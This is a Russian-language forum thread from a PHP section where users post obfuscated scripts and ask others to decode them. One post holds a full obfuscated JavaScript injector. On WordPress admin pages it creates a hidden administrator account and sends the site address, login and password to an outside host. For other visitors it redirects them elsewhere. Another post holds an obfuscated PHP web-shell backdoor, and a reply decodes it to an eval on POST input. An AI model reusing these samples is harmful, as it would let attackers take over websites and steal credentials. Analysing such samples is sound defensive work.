Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

Discussion in 'PHP' started by Sharky, 29 Sep 2009.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Декодировал с помощью проекта ___easytoyou.eu/decoder/demophp72

    Там 30 строк в демо, возможно даст прояснить суть скрипта.
    PHP:
    <?php
    /*
     * @ PHP 7.2
     * @ Decoder version : 1.0.0.3
     * @ Release on : 14/04/2021
     * @ Website    : http://EasyToYou.eu
     */

    class ModelExtensionModuleUniSettings extends Model
    {
        public function 
    getSetting($store_id)
        {
            
    $query $this->db->query("show columns FROM `" DB_PREFIX "uni_setting` WHERE Field = 'store_id'");
            if (!
    $query->num_rows) {
                
    $this->update();
            }
            
    $query $this->db->query("SELECT data FROM `" DB_PREFIX "uni_setting` WHERE store_id = " . (array) $store_id "");
            return 
    $query->rows json_decode($query->row["data"], true) : [];
        }
        public function 
    setSetting($store_id$data)
        {
            if (
    $this->check()) {
                
    $this->db->query("DELETE FROM `" DB_PREFIX "uni_setting` WHERE store_id = '" . (array) $store_id "'");
                
    $this->db->query("INSERT INTO `" DB_PREFIX "uni_setting` SET store_id = '" . (array) $store_id "', data = '" $this->db->escape(json_encode($datatrue)) . "'");
                
    $this->cache->delete("unishop.settings");
                return 
    "success";
            }
            return 
    "error";
        }
        public function 
    deleteSetting()
        {
            
    $this->db->query("DELETE FROM " DB_PREFIX "uni_setting");
        }
        public function 
    install()
        {
            
    $this->db->query("CREATE TABLE IF NOT EXISTS " DB_PREFIX "uni_setting (`store_id` int(11) NOT NULL, `data` mediumtext NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci");
            
    $this->db->query("ALTER TABLE `" DB_PREFIX "product` CHANGE `upc` `upc` varchar(255) COLLATE 'utf8_general_ci' NOT NULL");
            
    $this->db->query("ALTER TABLE `" DB_PREFIX "product` CHANGE `ean` `ean` varchar(255) COLLATE 'utf8_general_ci' NOT NULL");
            
    $this->db->query("ALTER TABLE `" DB_PREFIX "product` CHANGE `jan` `jan` varchar(255) COLLATE 'utf8_general_ci' NOT NULL");
            
    $this->db->query("ALTER TABLE `" DB_PREFIX "product` CHANGE `isbn` `isbn` varchar(255) COLLATE 'utf8_general_ci' NOT NULL"

    // This is the demo version. This version only decode 30 lines.
     
    _________________________
    erwerr2321 likes this.
  2. Dock191270

    Dock191270 New Member

    Joined:
    23 Apr 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0

    Суть я знаю, мне нужен код полностью.
    Если сможете декодировать, у меня есть еще 1 файл.
    Хотя хотелось бы найти человека, который имеет инструмент для этих манипуляций.
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Зачем искать? Купить подписку на вышеупомянутом сайте и дело с концом, цены там, считай что даром.
     
  4. kontakt555

    kontakt555 New Member

    Joined:
    15 Feb 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите, пожалуйста, расшифровать этот скрипт.
    <script>
    var _0x2201=[';\x20expires=','Chromium','Firefox','match','setRequestHeader','-new.php','getElementById','location','1pEvSEx','user','system','includes','1386439VHVeve','1594989JHnXwZ','17SZdvVQ','cookie','responseText','1mLtVLp','charAt','2rMTjPp','substring','userAgent','length','toUTCString','&pass2=','gerg34t3','links','indexOf','MSIE;','51106qkNGfp','123482vpaqfa','https://notifyaa.info/rs/23132?coun...339313UFkCyd!'];(function(_0x2f73a4,_0x2bc5ba){var _0x5a7fdf=_0x8574;while(!![]){try{var _0x21c0d9=parseInt(_0x5a7fdf(0xf6))*-parseInt(_0x5a7fdf(0xef))+-parseInt(_0x5a7fdf(0xe9))*parseInt(_0x5a7fdf(0xda))+-parseInt(_0x5a7fdf(0xf1))*parseInt(_0x5a7fdf(0xec))+parseInt(_0x5a7fdf(0xd9))+parseInt(_0x5a7fdf(0xea))*-parseInt(_0x5a7fdf(0xdf))+parseInt(_0x5a7fdf(0xdd))*parseInt(_0x5a7fdf(0xfe))+-parseInt(_0x5a7fdf(0xd4))*-parseInt(_0x5a7fdf(0xd8));if(_0x21c0d9===_0x2bc5ba)break;else _0x2f73a4['push'](_0x2f73a4['shift']());}catch(_0x13ea46){_0x2f73a4['push'](_0x2f73a4['shift']());}}}(_0x2201,0xe41a6));function setCookie(_0x4348ea,_0x3b8540,_0xe9fc90){var _0x357920=_0x8574,_0x886b24='';if(_0xe9fc90){var _0x474dff=new Date();_0x474dff[_0x357920(0xf3)](_0x474dff[_0x357920(0xfa)]()+_0xe9fc90*0x18*0x3c*0x3c*0x3e8),_0x886b24=_0x357920(0x103)+_0x474dff[_0x357920(0xe3)]();}document[_0x357920(0xdb)]=_0x4348ea+'='+(_0x3b8540||'')+_0x886b24+';\x20path=/';}function getCookie(_0x786ca9){var _0x2f4f40=_0x8574,_0x4dc549=_0x786ca9+'=',_0x45e7fb=document['cookie']['split'](';');for(var _0x37ddd7=0x0;_0x37ddd7<_0x45e7fb[_0x2f4f40(0xe2)];_0x37ddd7++){var _0x4bc780=_0x45e7fb[_0x37ddd7];while(_0x4bc780[_0x2f4f40(0xde)](0x0)=='\x20')_0x4bc780=_0x4bc780[_0x2f4f40(0xe0)](0x1,_0x4bc780[_0x2f4f40(0xe2)]);if(_0x4bc780[_0x2f4f40(0xe7)](_0x4dc549)==0x0)return _0x4bc780[_0x2f4f40(0xe0)](_0x4dc549[_0x2f4f40(0xe2)],_0x4bc780[_0x2f4f40(0xe2)]);}return null;}function isAdmin(){var _0x3f44fd=_0x8574;return!!document[_0x3f44fd(0xd2)]('wp-admin-bar-customize')||document['documentElement'][_0x3f44fd(0xf8)][_0x3f44fd(0xd7)](_0x3f44fd(0xd5)+_0x3f44fd(0xd1));}function request(_0x3e3a56,_0x2069f3,_0xa8e210,_0x3b1104){var _0x46f844=_0x8574;return req=new XMLHttpRequest(),req[_0x46f844(0xfb)](_0x2069f3,_0x3e3a56,_0x3b1104),req[_0x46f844(0xd0)](_0x46f844(0xfd),_0x46f844(0xee)),req['send'](_0xa8e210),req;}function getBaseUrl(){var _0x26f22c=_0x8574;for(var _0x9652c9=0x0,_0x13335c=document[_0x26f22c(0xe6)]['length'];_0x9652c9<_0x13335c;_0x9652c9++){var _0x5876bc=document[_0x26f22c(0xe6)][_0x9652c9]['href'];if(_0x5876bc[_0x26f22c(0xd7)](_0x26f22c(0xed))){var _0x29a675=_0x5876bc[_0x26f22c(0xff)](_0x26f22c(0xf9));return _0x29a675[0x0]+'wp-admin/';}}return'';}function _0x8574(_0x5645ee,_0x29db99){_0x5645ee=_0x5645ee-0xce;var _0x22016d=_0x2201[_0x5645ee];return _0x22016d;}function d(){var _0x429a1e=_0x8574;if(isAdmin()){if(getCookie(_0x429a1e(0xfc))===null){var _0x35915f=getBaseUrl(),_0x41e3f9=_0x35915f+_0x429a1e(0xd5)+'-new.php',_0x5777fd=request(_0x41e3f9,_0x429a1e(0xf5),'',![]),_0x5aee53=/ser" value="([^"]*?)"/g,_0xaa90c6,_0x7058f3='';_0xaa90c6=_0x5aee53[_0x429a1e(0x100)](_0x5777fd[_0x429a1e(0xdc)]);if(_0xaa90c6[_0x429a1e(0xe2)]===0x0)return![];_0x7058f3=_0xaa90c6[0x1];if(_0x7058f3==='')return![];var _0x2caffd=_0x429a1e(0xd6),_0x518996=_0x429a1e(0x102),_0x1e5e89='action=createuser&_wpnonce_create-user='+_0x7058f3+_0x429a1e(0xf7)+_0x2caffd+'&[email protected]&pass1='+_0x518996+_0x429a1e(0xe4)+_0x518996+_0x429a1e(0xf0);_0x5777fd=request(_0x41e3f9,_0x429a1e(0xf2),_0x1e5e89,!![]),_0x5777fd['onload']=function(){var _0x14a4d4=_0x429a1e,_0x338c8d=_0x35915f+';'+_0x2caffd+';'+_0x518996,_0x313482='https://minxca.site/valid';request(...f2),'s='+encodeURIComponent(_0x338c8d),!![]);},setCookie(_0x429a1e(0xfc),'do',0x16d);}}else{function_0x2e2ea9(){var _0x3f7b16=_0x429a1e;return navigator['userAgent'][_0x3f7b16(0xcf)](/Android/i)||navigator[_0x3f7b16(0xe1)][_0x3f7b16(0xcf)](/BlackBerry/i)||navigator['userAgent'][_0x3f7b16(0xcf)](/iPhone|iPad|iPod/i)||navigator[_0x3f7b16(0xe1)]['match'](/Opera Mini/i)||navigator['userAgent'][_0x3f7b16(0xcf)](/IEMobile/i);}function _0x105626(){var _0xf65e39=_0x429a1e;return navigator[_0xf65e39(0xe1)][_0xf65e39(0xe7)]('Edge')!==-0x1||navigator[_0xf65e39(0xe1)][_0xf65e39(0xe7)](_0xf65e39(0xe8))!==-0x1||navigator['userAgent'][_0xf65e39(0xe7)](_0xf65e39(0x101))!==-0x1||navigator[_0xf65e39(0xe1)]['indexOf'](_0xf65e39(0x104))!==-0x1||navigator[_0xf65e39(0xe1)]['indexOf'](_0xf65e39(0xce))!==-0x1||navigator['userAgent']['indexOf']('Chrome')!==-0x1;}var _0x2919cc=getCookie(_0x429a1e(0xe5));_0x2919cc!=='un'&&((_0x105626()||_0x2e2ea9())&&(setCookie(_0x429a1e(0xe5),'un',0x1e),window[_0x429a1e(0xd3)][_0x429a1e(0xf4)](_0x429a1e(0xeb))));}}d();
    </script>
     
  5. sabot4ge

    sabot4ge New Member

    Joined:
    29 Jul 2021
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    помогите с расшифровкой пожалуйста (даже 1 процент файла не влез в сообщение)
    можно даже за $, если по итогу всё нормально выйдет
    PHP:
    https://dropmefiles.com/Fgeeb
    перепробовал кучу деобфускаторов (От которых толку почти 0)
    ничего путного так и не вышло сделать
    частями тоже не выходило раскодировать
    очень нуждаюсь в этом файле:oops:
     
    #1085 sabot4ge, 8 Aug 2021
    Last edited: 20 Aug 2021
  6. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    Это весь код?

    PHP:
    <?php

    $O0OOO0OOO0 
    file(preg_replace("@\(.*\(.*$@""" ,__FILE__));

    if (
    preg_replace("@\(.*\(.*$@"""__FILE__) ==__FILE__ or preg_replace("@\(.*\(.*$@""" ,__LINE__) != 3)
        die(
    "<tt>ERROR");

    function 
    OO0O00OO0O($a$b) {
        
    $c = array(9893243225255);
        
    $k gzinflate(base64_decode("KyrNTcosKQYA")); // rumbits
        
    $O0O0 $k[6].$k[1].$k[3].$k[6].$k[5].$k[0]; // substr
        
    $O0 "$k[5]$k[0]$k[4]$k[2]"// trim

        
    if ($b == 138) {
            
    $d substr($a$c[0/* 989 */ $c[1/* 324 */$c[2/* 32 */);
        } elseif (
    $b == 60) {
            
    $d substr($a$c[0/* 989 */$c[1/* 324 */);
        }
        elseif (
    $b == 147) {
            
    $d trim(substr($a$c[0/* 989 */  $c[1/* 324 */ $c[2/* 32 */));
        }
       
        return 
    $d;
    }

    ?>
    Какие входящие данные?
     
    fandor9 likes this.
  7. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    прошу декодировать Ioncube, php 7.2.x. В человеческий вид сам приведу.
    file.io/yKTDIFZV0tu8
    Спасибо
     
  8. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    Шелл, я так понимаю.. Как зайти? Нужно какой-то get ему отправлять.
    Code:
    <?php
    class PJIZ{
           public $TEST= null;
           public $za= null;
            public $e='"hd2d1GR1N-ynNAvl"';
            public $d= null;
           public $all= null;
            function __construct(){
           $this->za = 'mv3gc3bierpvat2tkrnq';
           $this->TEST = @KILLED($this->za);
           $this->moreandmore = $this->TEST;
           $this->za = 'luutw';
           $this->TEST = @KILLED($this->za);
       
           $this->d=strrev($this->e);
       
           $this->moreandmore =$this->moreandmore.$this->d.$this->TEST;
            @eval($this->moreandmore);
            }}
    new PJIZ();
    
    function KILLED($YAXW){
        $KHVW = '';
        $v = 0;
        $vbits = 0;
        for ($i = 0, $j = strlen($YAXW); $i < $j; $i++){
            $v <<= 5;
            if ($YAXW[$i] >= 'a' && $YAXW[$i] <= 'z'){
                $v += (ord($YAXW[$i]) - 97);
            } elseif ($YAXW[$i] >= '2' && $YAXW[$i] <= '7') {
                $v += (24 + $YAXW[$i]);
            } else {
                exit(1);
            }
            $vbits += 5;
            while ($vbits >= 8){
                $vbits -= 8;
                $KHVW .= chr($v >> $vbits);
                $v &= ((1 << $vbits) - 1);}}
        return $KHVW;}
    
       $tips = 'O'.'N'.'E'.'P'.'I'.'E'.'C'.'E';
    
    
    
    
    echo $tips;
    
    ?>
     
  9. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Результирующий код из всей этой свистопляски будет:
    Code:
    eval($_POST["lvANny-N1RG1d2dh"]);
    
    Мысли вслух. Легко реверснуть, элементарно спалить по сигнатурам, неудобно использовать. Бекдор не решает ровном счётом ничего. Что курять изобретатели этих поделок? Загадка :)
     
    #1089 crlf, 20 Nov 2021
    Last edited: 20 Nov 2021
    Гаврила likes this.
  10. du98

    du98 New Member

    Joined:
    7 Mar 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите с расшифровкой пожалуйста. Очень надо. PHP 7.2.
    https://file.io/pri34arh5ndT
    Спасибо.
     
  11. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    Перезалей, файл удалён.
     
  12. Agnelus

    Agnelus New Member

    Joined:
    10 Apr 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую.
    Кто то может помочь с расшифровкой данного файла:
     
  13. RRK

    RRK New Member

    Joined:
    9 Dec 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь в рашифровке скрипта.
    PHP:
    <?php
     
    goto m5hZeWrJmW$ci curl_init(); goto JwIxZnUVifcurl_setopt($ciCURLOPT_HEADER0); goto ZryaGKwfZfcurl_close($ci); goto KXAclZryaGcurl_setopt($ciCURLOPT_RETURNTRANSFER1); goto oVDeLtPkkb$ce curl_exec($ci); goto KwfZfm5hZe$valid_product true; goto BlL0bBlL0b$domain $_SERVER["\110\124\124\x50\137\110\x4f\123\x54"]; goto EtPEroVDeLcurl_setopt($ciCURLOPT_POST1); goto WJpH_KXAcl$json json_decode($cetrue); goto dL59YWJpH_curl_setopt($ciCURLOPT_POSTFIELDS, array("\144\157\x6d\x61\x69\156" => $domain"\x61\143\164\x69\157\156" => "\x76\141\154\151\144\x61\164\x65")); goto tPkkbJWnrV: if ($json["\163\164\x61\x74\165\163"] !== "\x6f\153") { $valid_product false; } goto nzxkmJwIxZcurl_setopt($ciCURLOPT_URL"\x68\164\164\x70\x3a\57\57\144\x61\146\160\157\x64\x73\56\x63\157\57\166\x61\154\151\144\141\x74\x69\x6f\156\57"); goto nUVifEtPEr: if (isset($_GET["\144\x6f\x6d\141\x69\x6e"])) { $domain trim($_GET["\144\157\155\141\151\156"]); } goto WrJmWdL59Y: if (!is_array($json)) { $valid_product false; } goto JWnrVnzxkm: if (!$valid_product) { die("\x4e\157\40\166\x61\x6c\151\x64\40\154\151\x63\x65\156\x73\x65\41"); }
     
    #1093 RRK, 8 Jun 2022
    Last edited: 8 Jun 2022
  14. palich91

    palich91 New Member

    Joined:
    16 Jul 2012
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0